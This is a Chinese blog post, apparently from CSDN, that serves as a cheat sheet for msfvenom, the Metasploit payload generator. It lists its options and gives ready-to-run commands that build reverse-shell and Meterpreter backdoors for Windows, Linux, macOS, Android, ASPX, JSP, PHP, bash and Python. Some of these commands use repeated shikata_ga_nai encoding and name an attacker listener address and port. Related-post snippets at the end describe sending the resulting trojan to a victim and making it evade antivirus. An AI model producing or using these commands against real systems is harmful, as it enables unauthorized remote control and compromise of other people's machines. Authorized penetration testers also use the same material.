msfvenom常见的使用命令

最新推荐文章于 2024-08-22 22:20:04 发布
最新推荐文章于 2024-08-22 22:20:04 发布
阅读量2.7k 收藏 10
点赞数 1
分类专栏: 工具 Kali Android 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68012373/article/details/125451327
版权
工具 同时被 3 个专栏收录
7 篇文章 8 订阅
订阅专栏
Kali
2 篇文章 0 订阅
订阅专栏
Android
1 篇文章 0 订阅
订阅专栏

目录

简介

MSF后门生成模块

Msfvenom常用命令参数

msfvenom生成shellcode

常见生成格式

简介

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

使用说明:
-p, --payload 使用指定的payload
-l, --list [module_type] 列出指定模块可用的payloads,包括payloads、encoders、nops、all
-n, --nopsled 为payload指定一个 nopsled 长度
-f, --format 指定输出格式,如exe等
-e, --encoder 使用编码器
-a, --arch 指定payload构架(x86、x64)
--platform 指定payload平台
-s, --space 指定payload攻击荷载的最大长度
-b, --bad-chars 指定规避字符集,如: '\x00\xff‘
-i, --iterations 指定编码次数
-c, --add-code 指定一个附加的win32 shellcode 文件
-x, --template 指定一个可执行文件作为模板
-k, --keep payload自动分离并注入到新的进程
-o, --out 保存生成的payload
-v, --var-name 指定自定义变量
-h, --help 显示帮助文件

一、查看msfvenom支持的payload    msfvenom --list payload

二、查看msfvenom支持的平台         msfvenom --list platforms

三、查看msfvenom支持的编码格式  msfvenom --list encoders  其他的也是同理

MSF后门生成模块

Msfvenom常用命令参数

  1. -l, --list <type>
  2. # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等
  4. -p, --payload <payload>
  5. # 指定特定的 Payload,如果被设置为 - ,那么从标准输入流中读取
  7. --list-options
  8. # 列出--payload <value> 的标准,高级和规避选项
  10. -f, --format <format>
  11. # 指定 Payload 的输出格式(使用 --list formats 列出)
  13. -e, --encoder <encoder>
  14. # 指定使用的 Encoder (使用 --list encoders 列出)
  16. --sec-name <value>
  17. # 生成大型Windows二进制文件时使用的新名称。默认值:随机4个字符的字符串
  19. --smallest
  20. # 使用所有可用的编码器生成最小的payload
  22. --encrypt <value>
  23. # 应用于shellcode的加密或编码类型 (使用--list encrypt 列出)
  25. --encrypt-key <value>
  26. # 用于加密的密钥
  28. --encrypt-iv <value>
  29. # 加密的初始化向量
  31. -a, --arch <arch>
  32. # 指定目标系统架构(使用 --list archs 列出)
  34. --platform <platform>
  35. # 指定目标系统平台 (使用 --list platforms 列出)
  37. -o, --out <path>
  38. # 保存payload文件
  40. -b, --bad-chars <list>
  41. # 设置需要在 Payload 中避免出现的字符,如: '\x00\xff'
  43. -n, --nopsled <length>
  44. # 指定 nop 在 payload 中的数量
  46. -s, --space <length>
  47. # 设置未经编码的 Payload 的最大长度
  49. --encoder-space <length>
  50. # 编码后的 Payload 的最大长度
  52. -i, --iterations <count>
  53. # 设置 Payload 的编码次数
  55. -c, --add-code <path>
  56. # 指定包含一个额外的win32 shellcode文件
  58. -x, --template <path>
  59. # 指定一个特定的可执行文件作为模板
  61. -k, --keep
  62. # 保护模板程序的功能,注入的payload作为一个新的进程运行
  64. -v, --var-name <value>
  65. # 指定一个变量名(当添加 -f 参数的时候,例如 -f python,那么输出为 python 代码, payload 会被按行格式化为 python 代码,追加到一个 python 变量中,这个参数即为指定 python 变量的变量名)
  67. -t, --timeout <second>
  68. # 设置从STDIN读取payload的等待时间(默认为30,0为禁用)
  70. -h, --help
  71. # 帮助

msfvenom生成shellcode

普通生成

  1. msfvenom -p 有效载荷 -f 输出格式 -o 输出文件
  2. msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

编码生成

  1. msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件
  2. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

msfvenom —list archs #查看支持的系统架构

  1. aarch64, armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mips64, mips64le, mipsbe, mipsle, nodejs, php, ppc, ppc64, ppc64le, ppce500v2, python, r, ruby, sparc, sparc64, tty, x64, x86, x86_64, zarch

msfvenom —list platforms #查看支持系统平台

  1. aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, juniper, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unifi, unix, unknown, windows

msfvenom -l payload #列出所有可用的payload

msfvenom -l formats #列出所有的输出格式

msfvenom -l encrypt #列出所有的加密方式

msfvenom -l encoders #列出所有的编码器

常见生成格式

1、 Windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

2、Linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

3、Mac

msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

4、Android

msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

5、Aspx

msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

6、JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

7、PHP

msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

8、BASH

msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

9、Python

msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py

路baby
关注
专栏目录
Msfvenom使用指南
m0_57221101的博客
02-08 6209
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom使用
A_Z_dd的博客
06-01 680
娱乐身心即可
kali渗透内网和外网
最新发布
dzqxwzoe的博客
08-22 1033
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
msfvenom 使用
prettyX的博客
04-12 330
参考: https://blog.csdn.net/caiqiiqi/article/details/70768972 https://blog.csdn.net/whatday/article/details/82904623 比如,我们要生成一个在Linux平台下使用的elf,可以使用如下命令msfvenom -p linux/x86/meterpreter_reverse...
Msfvenom使用
Beret-81的博客
03-12 1189
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
msfvenom常用生成payload命令(第十课).docx
09-15
MSFVenom Payload 生成命令详解 MSFVenom 是 Metasploit Framework 中的一个组件,用于生成 Payload, Payload 是攻击者在攻击目标系统时使用的恶意代码。MSFVenom 提供了多种 Payload 生成方式,包括 Windows、Mac...
msfvenom常用生成payload命令(第十课)1
08-03
### msfvenom常用生成Payload命令详解 #### 一、概述 `msfvenom`是Metasploit框架中的一个工具,主要用于生成恶意载荷(payloads)。它可以帮助安全研究人员和渗透测试人员创建用于测试系统漏洞的定制化恶意代码。在...
msfvenom常用命令含义
05-31
以下是msfvenom常用的命令含义: 1. -p:指定payload类型,例如windows/meterpreter/reverse_tcp。 2. -f:指定输出格式,例如exe、raw、python等。 3. -o:指定输出文件名。 4. -a:指定payload架构,例如x86、...
msfvenom基本使用
02-24
以下是对 `msfvenom` 基本使用和相关知识点的详细解释: 1. **添加Payload**:`-p` 或 `--payload-options` 参数允许你选择要使用的payload类型。例如,`windows/meterpreter/reverse_tcp` 是一个常用的Windows平台...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行文件。 前提条件: 1.Linux环境。 2.安装了METASPLOIT框架。 如果您在Kali Linux上运行它会更好。 安装说明 : 下载程序并提供可执行的permision,然后使用./PayloadCreator.pl运行,或者在没有givin permision的情况下运行perl PayloadCreator.pl *忽略info.pl
网络攻防作业——Msfvenom使用
yyy7654321的博客
06-28 3040
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
msfvenom 基本使用
blackguest07的博客
03-05 1637
msfvenom 基础命令
msfvenom介绍
weixin_46483815的博客
05-11 2525
主要介绍msfvenom 和一些实验
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1748
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
msfvenom使用
2301_80361487的博客
01-21 519
坦白说查看器之类的,杀毒软件可能报毒,其。命令获取系统最高用户的权限,可以进一步渗透。个木马传给靶机,可以改一改名字,比如。3.等待受害者点击test.exe文件。上面启动一个终端执行以下命令。4.文件被受害者点击运行后,可以看到当前用户权限为。上面,运行后就可以在。输出文件到当前目录下。在这里,我们生成一个。文件夹下),控制端的。
metasploit中msfvenom命令解释说明
WEL测试
08-29 6578
使用的版本如下图所示:v4.16.0-dev- 在这个版中,之前的msfpayload、msfencode命令被整合到msfvenom中。 在命令行执行命令msfvenom -h可以查看msfvenom解释说明: 针对上面的信息进行解释如下: MsfVenom:是Metasploit的独立负荷(payload)生成器。同时也替代了命令msfpayload、msfenco
Msfvenom介绍及利用
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

路baby

你的鼓励将是我创作的最大动力✌

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值